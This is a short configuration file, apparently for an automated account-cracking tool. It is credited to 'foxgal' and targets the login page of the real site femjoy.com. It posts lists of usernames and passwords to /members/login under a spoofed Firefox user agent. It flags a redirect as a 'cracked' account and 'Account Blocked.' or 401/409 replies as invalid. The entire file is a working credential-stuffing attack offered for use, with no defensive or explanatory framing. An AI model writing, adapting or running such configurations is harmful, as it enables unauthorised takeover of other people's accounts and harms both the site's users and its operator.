[Details]
Title=Femjoy
Author=foxgal
Version=1.0
ConnectionCount=1
UserAgent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
CrackedString=redirect
InvalidString=Account Blocked.|409 Conflict|401 Authorization Required
[Connection_1]
Host=femjoy.com
URL=/members/login
PostData=username=[user]&password=[pass]
IsLogin=1
Method=1
ParseCount=0
